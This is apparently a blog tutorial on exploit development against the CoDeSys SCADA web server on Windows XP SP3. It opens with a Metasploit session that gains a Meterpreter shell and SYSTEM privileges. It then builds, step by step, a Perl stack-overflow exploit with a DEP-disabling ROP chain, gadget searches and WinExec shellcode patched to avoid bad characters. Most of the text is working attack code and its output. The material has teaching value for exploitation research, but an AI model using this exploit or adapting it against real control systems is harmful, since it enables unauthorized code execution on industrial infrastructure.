   --  ----
   0   CoDeSys v2.3 on Windows XP SP3
   1   CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3

msf  exploit(codesys_web_server) > set TARGET 1
TARGET => 1
msf  exploit(codesys_web_server) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf  exploit(codesys_web_server) > exploit

[*] Started bind handler
[*] Trying target CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3...
[*] Sending stage (752128 bytes) to 172.16.66.128
[*] Meterpreter session 1 opened (172.16.66.1:60855 -> 172.16.66.128:4444) at 2012-01-14 03:31:41 -0500

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

SCADA Wars Episode 2 – Attack of the Stack

It’s very rare nowadays to approach a bug without the expectation of needing to bypass at least one or two exploit mitigation techniques.  These memory protection mechanisms are most commonly a coupling of DEP and ASLR.  Since we are targeting an older version of Windows, however, ASLR has not been implemented yet.  And, as mentioned earlier, even though DEP has been implemented, it is disabled by default for all user applications, including CoDeSys.

To make things more interesting, let’s manually enable DEP and rewrite our exploit.

With the stack marked non-executable, we won’t be able to directly return into code we introduce in memory but instead have to rely on Return-Oriented Programming (ROP).  By chaining together the tails of function calls (referred to as ROP gadgets), we can execute arbitrary code piece-by-piece, most commonly to achieve the end goal of disabling DEP and returning into shellcode.

Instead of writing one from scratch, we’ll begin with a DEP-disabling ROP chain from Corelan Team’s ROPdb and adapt it to our exploit.  While the published chains are meant to function without alteration, we need to mind our list of bad chars and find replacement gadgets for any pointers affected.  Comparing the chains in ROPdb with the list of loaded modules, it’s apparent that the only DLL with a readily available chain is advapi32.dll, which disables DEP by performing a call to the NtSetInformationProcess function:

Starting with the same base exploit structure as above, we’ll append the ROP chain and identify any offending pointers (denoted with a string of exclamation points):

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>\n";
    exit 1; # Don't fall through and connect with no target
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes
$exploit .= pack('V', 0x0defaced); # Control over EIP
$exploit .= "A"x524;
$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

# advapi32.dll ntdll.ZwSetInformationProcess() chain by corelanc0d3r
# https://www.corelan.be/index.php/security/corelan-ropdb/
$exploit .= pack('V', 0x77e25c1f); # !!!!! # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x77e25c1f); # !!!!! # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77df563a); # !!!!! # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x77e25c1f); # !!!!! # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

Not too bad; we only need to find replacements for two gadgets.  We’ll use mona.py to generate a list of gadgets and go from there.

The script displays a great deal of debugging information to the console, as well as some automatically generated DEP-disabling ROP chains of its own, but the results we’re actually looking for are in rop.txt under Immunity’s installation directory.  It would be easy enough to just use the chains generated by the command, but as we can see, they make frequent use of our blacklisted characters:

The first replacement gadget we need to find is “pop eax; ret”.  This is a fairly common instruction sequence since the x86 calling convention typically stores the return value in EAX, so we should have no issue finding a suitable replacement.

We’ll first grep for all “pop eax” gadgets whose address doesn’t start with a null byte:

$ grep "POP EAX" rop.txt | grep -v 0x00 | cut -d* -f1 | head
0x1000c0be : # PUSH ECX # PUSH EAX # POP EAX # POP ECX # POP EBP # POP ECX # POP EBX # RETN 04
0x1000c0bf : # PUSH EAX # POP EAX # POP ECX # POP EBP # POP ECX # POP EBX # RETN 04
0x1000654e : # POP EAX # POP ESI # RETN
0x10006590 : # POP EAX # POP ESI # RETN
0x10007bfb : # POP EAX # POP ESI # RETN
0x10007771 : # POP EAX # POP ESI # RETN
0x10007747 : # POP EAX # RETN
0x1000fd85 : # POP EAX # POP ESI # RETN
0x10007d59 : # POP EAX # POP ESI # RETN
0x10007697 : # POP EAX # RETN

Great, but so far every gadget still has a null byte in the address.  Let’s restrict our search a little more to filter out all pointers starting with 0x1000:

$ grep "POP EAX" rop.txt | grep -v 0x00 | grep -v 0x1000 | cut -d* -f1
$

Interestingly enough, no suitable replacement gadgets exist in the results.  One thing to note, though, is that mona.py defaults its ROP generation to non-OS modules (as well as non-ASLR and non-rebase), so we’ll have to broaden our scope a bit to find the gadget we need. Because the overall goal is to make exploits as universal as possible (working against a wide array of target systems and versions), it’s best to not use modules provided by the system itself since they have a high likelihood of changing between OS versions.  However, we’ll take a hit here for the sake of getting a working PoC.
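Since grep only matches the text of each line, it can help to check gadget addresses byte by byte instead.  Below is a minimal sketch of that idea, not part of the original toolchain: the function names are hypothetical, the sample lines are copied from the listings in this post, and the bad char set is a deliberately partial assumption (only the null byte and 0x25 are named in this section).

```python
import re

# Assumed, partial bad-char set for illustration only: this section names the
# null byte and 0x25; the full list used by the exploit is longer.
BAD_CHARS = {0x00, 0x25}

# Matches lines shaped like "0x76f3c97e : # POP EAX # RETN".
GADGET_LINE = re.compile(r"^(0x[0-9a-fA-F]{8})\s*:\s*(.*)$")


def address_is_clean(address, bad_chars=BAD_CHARS):
    """Return True if none of the four bytes of the address is a bad char."""
    return not any(b in bad_chars for b in address.to_bytes(4, "little"))


def clean_gadgets(lines, wanted, bad_chars=BAD_CHARS):
    """Yield (address, text) for gadgets containing `wanted` at a clean address."""
    for line in lines:
        match = GADGET_LINE.match(line.strip())
        if not match:
            continue  # skip anything that is not a gadget line
        address = int(match.group(1), 16)
        text = match.group(2)
        if wanted in text and address_is_clean(address, bad_chars):
            yield address, text


sample = [
    "0x1000654e : # POP EAX # POP ESI # RETN",
    "0x10007747 : # POP EAX # RETN",
    "0x76f3c97e : # POP EAX # RETN",
]

for address, text in clean_gadgets(sample, "POP EAX"):
    print(hex(address), text)
```

Checking every byte rather than just the prefix also catches bad chars hiding in the middle of a pointer, which a pattern like "0x00" would miss.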

We’ll regenerate our list of ROP gadgets, this time restricting ourselves to the system DNSAPI.dll module by passing the -m flag to mona.py:

!mona rop -m DNSAPI.dll

This graces us with the following gadget list to search through:

$ grep "POP EAX" rop_dnsapi.txt | cut -d* -f1
0x76f3e0c8 : # ADD EBP,DWORD PTR DS:[EDX+57] # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3c976 : # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3c97e : # POP EAX # RETN
0x76f3e0ca : # PUSH EDI # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3e0cb : # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3c974 : # PUSH 3 # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3e0c9 : # PUSH 57 # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3c971 : # OR BYTE PTR SS:[EBP+8],DH # PUSH 3 # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3c973 : # OR BYTE PTR DS:[EDX+3],CH # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3c97c : # PUSH 0D # POP EAX # RETN

Perfect, the gadget at 0x76f3c97e will work fine.  Update our ROP chain:

# advapi32.dll ntdll.ZwSetInformationProcess() chain by corelanc0d3r
# https://www.corelan.be/index.php/security/corelan-ropdb/
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77df563a); # !!!!! # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

One last gadget we need to find a replacement for is “xchg eax, ebx; ret”.  We’ll grep through rop.txt and see if there are any candidates:

$ grep "XCHG EAX,EBX" rop.txt | cut -d* -f1
0x0040fcb3 : # XCHG EAX,EBX # XOR EAX,E58B0000 # POP EBP # RETN
0x0040dab3 : # XCHG EAX,EBX # PUSH EDI # ADD BYTE PTR DS:[EAX],AL # MOV ESP,EBP # POP EBP # RETN

Bad luck.  Looks like we’ll have to rely on a system module again.  However, DNSAPI.dll doesn’t seem to have the gadget either:

$ grep "XCHG EAX,EBX" rop_dnsapi.txt | cut -d* -f1
$

Let’s generate a list of gadgets from the system SHELL32.dll module and see if something there will help us:

$ grep "XCHG EAX,EBX" rop_shell32.txt | cut -d* -f1 | head
0x7ca04919 : # XCHG EAX,EBX # SUB BH,DH # DEC ECX # RETN
0x7ca6f081 : # XCHG EAX,EBX # RETN 00
0x7cb4f687 : # XCHG EAX,EBX # ADD AX,3B00 # RETN
0x7ca7870a : # XCHG EAX,EBX # MOV EBP,17C # ADD BH,BH # ADC EAX,<&USER32.EndDialog> # XOR EAX,EAX # POP EBP # RETN 10
0x7ca17509 : # XCHG EAX,EBX # PUSH EAX # ADD EAX,DWORD PTR DS:[EAX] # POP EDI # XOR EAX,EAX # POP ESI # INC EAX # POP EBX # POP EBP # RETN 0C
0x7ca787d8 : # XCHG EAX,EBX # MOV EBP,17C # ADD BH,BH # ADC EAX,<&USER32.EndDialog> # MOV EAX,ESI # POP ESI # POP EBP # RETN 10
0x7ca11f36 : # XCHG EAX,EBX # OR AL,BYTE PTR DS:[EAX] # XOR EAX,EAX # RETN 04
0x7caab0cd : # XCHG EAX,EBX # POP ES # ADD BYTE PTR DS:[EBX],BH # RETN
0x7ca3ae19 : # XCHG EAX,EBX # ADD DWORD PTR DS:[EAX],EAX # ADD BYTE PTR DS:[EBX+5D5E5FC7],CL # RETN 04
0x7ca034ed : # XCHG EAX,EBX # SAHF # ADD AL,BYTE PTR DS:[EAX] # POP EDI # POP ESI # POP EBP # RETN 08

The gadget at 0x7ca6f081 will do perfectly.  The 00 in “RETN 00” denotes the number of bytes the stack will be adjusted by upon return, which in this case is 0 and parallels the functionality of a “normal” return.

A fair question in this scenario: why would the module contain a “ret 0” instruction if it’s exactly the same as a “ret”?  The answer is that the instruction isn’t actually meant to be there at all.  The x86 architecture sports a number of properties favorable for exploit development, namely that instructions are both variable-length and unaligned.  x86 instructions don’t have a fixed width in memory, unlike ARM or MIPS, whose instructions are always 2 or 4 bytes wide, so we can find a single useful opcode and disassemble backwards until we find an acceptable sequence of instructions.  And because instructions are unaligned, we can execute them at any offset and are not restricted to returning into addresses that, for example, end in 0x0, 0x4, 0x8, or 0xc.
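To make the idea concrete, here is a toy decoder that understands just four x86 opcodes (B8, 93, C2, C3).  It is only a sketch: the byte string is made up for illustration and is not the actual content of SHELL32.dll, and `decode` is a hypothetical helper rather than a real disassembler.

```python
def decode(code, offset):
    """Decode a few x86 opcodes starting at `offset`, stopping at a return."""
    out = []
    i = offset
    while i < len(code):
        op = code[i]
        if op == 0xB8:  # MOV EAX, imm32 (5 bytes)
            imm = int.from_bytes(code[i + 1:i + 5], "little")
            out.append(f"MOV EAX,{imm:08X}")
            i += 5
        elif op == 0x93:  # XCHG EAX, EBX (1 byte)
            out.append("XCHG EAX,EBX")
            i += 1
        elif op == 0xC2:  # RETN imm16 (3 bytes)
            imm = int.from_bytes(code[i + 1:i + 3], "little")
            out.append(f"RETN {imm:02X}")
            break
        elif op == 0xC3:  # RETN (1 byte)
            out.append("RETN")
            break
        else:  # anything else is out of scope for this toy
            out.append(f"DB {op:02X}")
            i += 1
    return out


# Illustrative bytes only: a MOV with a 32-bit immediate, followed by a RETN.
code = bytes.fromhex("B893C20000C3")

print(decode(code, 0))  # decoding at the intended instruction boundary
print(decode(code, 1))  # decoding one byte in, inside the immediate
```

Starting at offset 0 the decoder sees the MOV the compiler intended, while starting one byte later the immediate operand itself decodes as an XCHG followed by a RETN 00, which is the same kind of accident that produces our gadget.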

To demonstrate this, we’ll start by disassembling our gadget at 0x7ca6f081, where we see the desired instruction sequence:

However, by simply pressing the “up” button, our disassembly realigns to the program’s proper instruction alignment, and we see that these opcodes are actually part of a CALL:

Moving ahead, let’s update our ROP chain with the final replacement gadget:

# advapi32.dll ntdll.ZwSetInformationProcess() chain by corelanc0d3r
# https://www.corelan.be/index.php/security/corelan-ropdb/
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

Now that our ROP chain is all set, we need to actually be able to execute it.  The easy way to do this is to simply return into the first gadget upon gaining control over EIP.  At the moment, we corrupt EIP with the value 0x0defaced, so it should be simple enough to just restructure our exploit and relocate the ROP chain in place of this dummy value.  In order to prevent changes to stack offsets and addresses, we’ll store a placeholder where the ROP chain used to be to keep our input to the program the same length:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>\n";
    exit 1;
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes

$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "A"x424;

$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

$exploit .= "A"x104;

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;
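The padding sizes in the restructured script can be sanity-checked with a little arithmetic.  This is a minimal sketch using only the lengths visible in the listings; the constant and function names are hypothetical.

```python
DWORD = 4
ALIGNMENT = 1            # the single "A" after "GET /"
ROP_CHAIN_DWORDS = 26    # entries in the ROP chain listing
POINTERS = 2 * DWORD     # readable pointer + writable pointer


def offset_original():
    """Bytes before the two pointers in the original layout."""
    # "A" + dummy EIP value + "A" x 524
    return ALIGNMENT + DWORD + 524


def offset_restructured(extra_len=0):
    """Bytes before the two pointers once the chain replaces the dummy EIP."""
    # Anything placed right after the chain must come out of the padding.
    padding = 424 - extra_len
    return ALIGNMENT + ROP_CHAIN_DWORDS * DWORD + extra_len + padding


chain_len = ROP_CHAIN_DWORDS * DWORD
total_original = offset_original() + POINTERS + chain_len
total_restructured = offset_restructured() + POINTERS + 104  # trailing "A" x 104

print(offset_original(), offset_restructured())
print(total_original, total_restructured)
```

Both layouts put the two pointers at the same offset and produce the same overall length, so the stack addresses hardcoded in the exploit stay valid.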

Now that we’ve disabled DEP, we need to execute our shellcode.  This particular ROP chain will immediately transfer execution to the top of the stack after its completion, which can be observed by studying the last few gadgets.

At the time of the final gadget’s (“pushad; dec ebx; mov ebx, 0x33c233f6; ret”) execution, the function pointer we wish to call (NtSetInformationProcess) resides in EBP.  By referencing the documentation of the PUSHAD instruction, we can see that EBP is pushed onto the stack sixth out of eight registers, placing it at offset 0x8 from the top of the stack:

ELSE (* OperandSize = 32, PUSHAD instruction *)
   Temp := (ESP);
   Push(EAX);
   Push(ECX);
   Push(EDX);
   Push(EBX);
   Push(Temp);
   Push(EBP);
   Push(ESI);
   Push(EDI);
FI;

The next two instructions in the gadget (“dec ebx; mov ebx, 0x33c233f6”) are inconsequential and can be safely ignored.  As we can see, the PUSHAD instruction also results in pushing the ESI and EDI registers above EBP on the stack, which both contain the pointer 0x77e3cb79.

This pointer is actually another gadget to be executed (twice), but unlike other gadgets which perform any number of potentially complex operations, this one is simply a single RET instruction:

This particular gadget is referred to as a “ROP NOP,” similar to how the NOP (No-OPeration) instruction in x86 simply “does nothing”.  When utilized in a ROP chain, we can simply slide down the stack, returning into gadgets that “do nothing” until we reach an interesting pointer.  In this case, we execute two ROP NOPs until we return into the NtSetInformationProcess pointer to disable DEP.
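The stack that PUSHAD leaves behind can be modeled in a few lines.  This is only a sketch: the register values are taken from the comments in the ROP chain, while EBP and the saved ESP are shown as descriptive strings because their real values only exist at runtime.

```python
def pushad(stack, regs, esp_before):
    """Push registers in PUSHAD order; the last push ends up on top."""
    for name in ("EAX", "ECX", "EDX", "EBX"):
        stack.append((name, regs[name]))
    stack.append(("ESP (before PUSHAD)", esp_before))
    for name in ("EBP", "ESI", "EDI"):
        stack.append((name, regs[name]))


regs = {
    "EAX": 0x4,           # NEG of 0xfffffffc
    "ECX": 0x77e4b1fc,    # ptr to 0x02
    "EDX": 0x22,          # NEG of 0xffffffde
    "EBX": 0xffffffff,
    "EBP": "&NtSetInformationProcess",
    "ESI": 0x77e3cb79,    # RETN (ROP NOP)
    "EDI": 0x77e3cb79,    # RETN (ROP NOP)
}

stack = []
pushad(stack, regs, "stack address just past the ROP chain")

# The stack grows downward, so reverse the push order to view it from ESP up.
top_down = list(reversed(stack))
for index, (name, value) in enumerate(top_down):
    shown = hex(value) if isinstance(value, int) else value
    print(f"ESP+{index * 4:#04x}  {name:<20} {shown}")
```

Read from the top: two ROP NOPs, then the function pointer at offset 0x8, followed by the five dwords the function sees once it is entered.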

Upon completion of the function, we return into the next dword on the stack.  Referencing the PUSHAD documentation once again, we see that the register pushed immediately before EBP was the value of ESP before the operation.  This is excellent, because by returning into this value we transfer execution directly to stack memory adjacent to the ROP chain itself, which at the moment is just our placeholder of a bunch of “A”s:

All we have to do from this point is stash some shellcode immediately after the ROP chain and we’ll have our shell.  We can grab a simple WinExec shellcode here.  Update our exploit:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>\n";
    exit 1;
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes

$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8\x8d\x15\x86\x7c\xff\xd0";

$exploit .= "A"x(424-23);

$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

$exploit .= "A"x104;

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

So are we finished?  God, no.

We need to do a little refactoring of this shellcode before we can use it.  The hardcoded WinExec address it uses is not correct for XP SP3, so we first need to update it with the correct address 0x7c86250d:

\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8\x0d\x25\x86\x7c\xff\xd0

However, this presents another problem.  The true WinExec address contains the bad char 0x25, and it doesn’t seem immediately feasible to jump to a nearby address without the offending byte due to the RET:

So let’s tack on a couple more bytes to our shellcode.  Instead of directly MOVing &WinExec to EAX, we can be tricky and MOV the two’s complement of the function pointer and NEG (negate) it.  The disassembly of our new shellcode will look like this:

02CDFA7C   8BEC             MOV EBP,ESP
02CDFA7E   68 65786520      PUSH 20657865
02CDFA83   68 636D642E      PUSH 2E646D63
02CDFA88   8D45 F8          LEA EAX,DWORD PTR SS:[EBP-8]
02CDFA8B   50               PUSH EAX
02CDFA8C   B8 F3DA7983      MOV EAX,8379DAF3
02CDFA91   F7D8             NEG EAX
02CDFA93   FFD0             CALL EAX
